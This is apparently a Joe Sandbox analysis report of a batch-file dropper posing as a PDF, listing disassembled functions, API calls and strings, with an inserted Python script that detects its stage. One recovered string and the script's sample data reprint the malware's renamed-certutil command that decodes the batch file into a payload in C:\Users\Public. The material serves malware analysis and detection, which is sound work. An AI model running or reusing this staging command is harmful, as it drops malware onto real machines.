                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Concurrency::cancel_current_taskmalloc
                                      • String ID:
                                      • API String ID: 1412018758-0
                                      • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction ID: f090eb7926ce24c860bcb84f1e542b3b97e04b2420b2439611bfda745a8b02d0
                                      • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                      • Instruction Fuzzy Hash: 65E092CBF5930791FE143B62684117892405F18F68FCC2430CD0E09782EE2CF8918330
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcess
                                      • String ID:
                                      • API String ID: 1617791916-0
                                      • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction ID: 44706e5a77077c0b5c8ddf152b709d7bc288a67bd0d79f9e1579c805c9462ec3
                                      • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                      • Instruction Fuzzy Hash: EDF019BBE18A8386EA45AB15F84007CFBA1FB89F44BDD9438D90E43354DF7CA481C620
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: exit
                                      • String ID:
                                      • API String ID: 2483651598-0
                                      • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction ID: 81f9d75822dda14730cadf88005f73625eb9b3c07ad1d6ce190c222bdd2c60bb
                                      • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                      • Instruction Fuzzy Hash: 4DC0127670874747EB5C7731249103999555B09F15F885478C50681281DD6CDC048214
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: DefaultUser
                                      • String ID:
                                      • API String ID: 3358694519-0
                                      • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction ID: 97cec5db0f111e631af2bdd3643167faf7dbcda2662f1e2541dad4e1271ff61d
                                      • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                      • Instruction Fuzzy Hash: 15E02BFBD082938BF5943B4164413B49953CB78FA7FCC4031C70E022C4ED2D2E456628
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID:
                                      • API String ID: 2221118986-0
                                      • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction ID: 08bfc19c71f091ed5aee499db9d885408c3def87804c3ff2857b07183fdd1771
                                      • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                      • Instruction Fuzzy Hash: 44F0BE66B09BC240EA409B57B940129A2909B88FF4B8C8330EB7D47BC9DE3CD8528300
                                      APIs
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F44
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC7F5C
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7F9E
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC7FFF
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8020
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8036
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8061
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8075
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC80D6
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC80EA
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8177
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC819A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81BD
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81DC
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC81FB
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC821A
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CC8239
                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8291
                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82D7
                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC82FB
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC831A
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8364
                                      • RtlFreeHeap.NTDLL ref: 00007FF755CC8378
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC839A
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83AE
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC83E6
                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8403
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF755CC8418
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                      • API String ID: 3637805771-3100821235
                                      • Opcode ID: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction ID: 2d25489c8d181c2dc94be42cd86b9f12feab3f75d1d1712156a6a443c460aaba
                                      • Opcode Fuzzy Hash: d74073052f036fb2306f86013512fc5dd735d89bb1ebe6582b1f79b80fa44d3e
                                      • Instruction Fuzzy Hash: 14E194BBA046938AE750EB51E40417AFBA1FB49F99BC89235CD1E93790DF3CA445C720
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                      • String ID: DPATH
                                      • API String ID: 95024817-2010427443
                                      • Opcode ID: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction ID: 17ec2e23ce6083fa4e86844201c20c1a3b0f398a8662be62575ee5a4599a0a5b
                                      • Opcode Fuzzy Hash: 2dd73e123b097a23a112381bfb0238d2ff060e9a1d02d3e8a60a86283e7ef037
                                      • Instruction Fuzzy Hash: 8212C8BBA0868386E764AF11A440179FBA1FF89F59F889179EA5E47794DF3CD400CB10
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                      • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                      • API String ID: 1795611712-3662956551
                                      • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction ID: 458b22ada00aa02fd7f885a4b2b95b088bc0633d77c8d99afef250876525c204
                                      • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                      • Instruction Fuzzy Hash: D3E1A2ABE0864386E750AB64E8401BDEAA1FF44F8DFDC5531DA0E47695EE3CE544C320
                                      APIs
                                      • _wcsupr.MSVCRT ref: 00007FF755CCEF33
                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEF98
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFA9
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFBF
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF755CCEFDC
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCEFED
                                      • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF003
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF022
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF083
                                      • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF092
                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF0A5
                                      • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF755CCF0DB
                                      • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF135
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF16C
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CCF185
                                        • Part of subcall function 00007FF755CB01B8: _get_osfhandle.MSVCRT ref: 00007FF755CB01C4
                                        • Part of subcall function 00007FF755CB01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CBE904,?,?,?,?,00000000,00007FF755CB3491,?,?,?,00007FF755CC4420), ref: 00007FF755CB01D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                      • String ID: <noalias>$CMD.EXE
                                      • API String ID: 1161012917-1690691951
                                      • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction ID: 7f85f301128a83fe36914602a667398bcf9620d9622955d0ff0358fb50793b3b
                                      • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                      • Instruction Fuzzy Hash: 5F91A3ABB0868386FB55BB60D8001BDAAA0AF4AF5DFCC5135DD1E426D5DF3CA445C320
                                      APIs
                                      Strings
                                      • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 , xrefs: 00007FF755CBC9F1
                                      • GOTO, xrefs: 00007FF755CAD0A3
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                      • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 $GOTO
                                      • API String ID: 3863671652-294573629
                                      • Opcode ID: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction ID: 78ad319447d94514cd48535676afd331a9b85d58ed1a9bce6f424c472d0d0ee4
                                      • Opcode Fuzzy Hash: 3640a331ccc2cc57322506a3803c6ed823bdadfa8ecf7f5cc83c189721e7befd
                                      • Instruction Fuzzy Hash: 0CE1ADAFE0968386FA61BB14D4543B9ABA0AF45F58FCC4935DA1E462D1DF3CE841C720
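The command line recovered at xref 00007FF755CBC9F1 above, `C:\\Users\\Public\\kn -decodehex -F "<the .bat>" "C:\\Users\\Public\\spoolsv.MPEG" 9`, has exactly the argument shape of certutil's `-decodehex [-f] InFile OutFile [type]`: a binary named `kn` in C:\Users\Public is asked to hex-decode the submitted batch file itself into a second file in the same folder. The script below is an added detection example for this page, not part of the Joe Sandbox report or of any vendor rule set. It scores process-creation events on those three traits (certutil decode syntax from an image not named certutil.exe, execution from a user-writable staging folder, decode output landing in such a folder). The event dictionaries, the `Image`/`CommandLine` field names and the staging-folder list are assumptions for illustration; only the first command line is the one from the report, with the C-escaped doubled backslashes collapsed by the normaliser.

```python
"""Flag process-creation events shaped like the renamed-certutil decode stage
seen in this report: "C:\\Users\\Public\\kn -decodehex -F <bat> <out> 9".

Added example for this report page, not Joe Sandbox output. Event layout
(Image / CommandLine keys) and the staging-folder list are assumptions.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# certutil.exe switches that materialise a decoded/downloaded file on disk.
CERTUTIL_DECODE_SWITCHES = {"-decodehex", "-decode", "-urlcache"}

# User-writable folders no legitimate certutil/cmd copy should execute from
# or decode payloads into (assumed list; extend per environment).
SUSPICIOUS_DIRS = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp")


@dataclass
class Finding:
    image: str
    reasons: List[str] = field(default_factory=list)


def normalise(path: str) -> str:
    """Collapse the doubled backslashes of C-escaped strings and lowercase."""
    return path.replace("\\\\", "\\").lower()


def tokenize(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def assess(event: dict) -> Optional[Finding]:
    argv = tokenize(event["CommandLine"])
    if not argv:
        return None
    image = normalise(event.get("Image") or argv[0])
    basename = image.rsplit("\\", 1)[-1]
    directory = image.rsplit("\\", 1)[0]
    switches = {a.lower() for a in argv[1:] if a.startswith("-")}
    # Positional (non-switch) arguments that look like file paths.
    paths = [normalise(a) for a in argv[1:] if not a.startswith("-") and "\\" in a]
    reasons = []

    # 1. certutil decode syntax ("-decodehex [-f] InFile OutFile [type]") issued
    #    by an image that is not named certutil.exe: a renamed LOLBin.
    decode = switches & CERTUTIL_DECODE_SWITCHES
    if decode and basename != "certutil.exe":
        reasons.append(f"certutil switch {sorted(decode)} run as '{basename}'")

    # 2. The image itself executes from a world-writable staging folder.
    if image.startswith(SUSPICIOUS_DIRS):
        reasons.append(f"image executes from {directory}")

    # 3. The decode output (second positional path) lands in a staging folder.
    if decode and len(paths) >= 2 and paths[1].startswith(SUSPICIOUS_DIRS):
        reasons.append(f"decoded payload written to {paths[1]}")

    return Finding(image, reasons) if reasons else None


def scan(events: List[dict]) -> List[Finding]:
    return [f for f in (assess(e) for e in events) if f]


# Constructed events. Only the first CommandLine is taken from the report
# (xref 00007FF755CBC9F1); the other two are made-up benign controls.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\kn",
     "CommandLine": r'C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"C:\Windows\System32\certutil.exe -decodehex C:\temp\cert.hex C:\temp\cert.cer"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /c dir"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.image)
        for r in finding.reasons:
            print("  -", r)
```

The three checks are deliberately independent: a renamed certutil running from a system path still trips check 1, and an unknown binary in C:\Users\Public trips check 2 even when its command line is unremarkable, so a single event from this sample accumulates all three reasons while the genuine `certutil.exe -decodehex` of a certificate file produces none.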
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.1670857937.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                       • Associated: 00000005.00000002.1670842360.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670881475.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670896265.00007FF755CF4000.00000004.00000001.01000000.00000004.sdmp
                                       • Associated: 00000005.00000002.1670956474.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$BufferConsoleInfoScreen
                                      • String ID:
                                      • API String ID: 1034426908-0
                                      • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                      • Instruction ID: 193145b707c10f73b67f6362c5f895428b69949868a30531b33e6f607f9ee92b
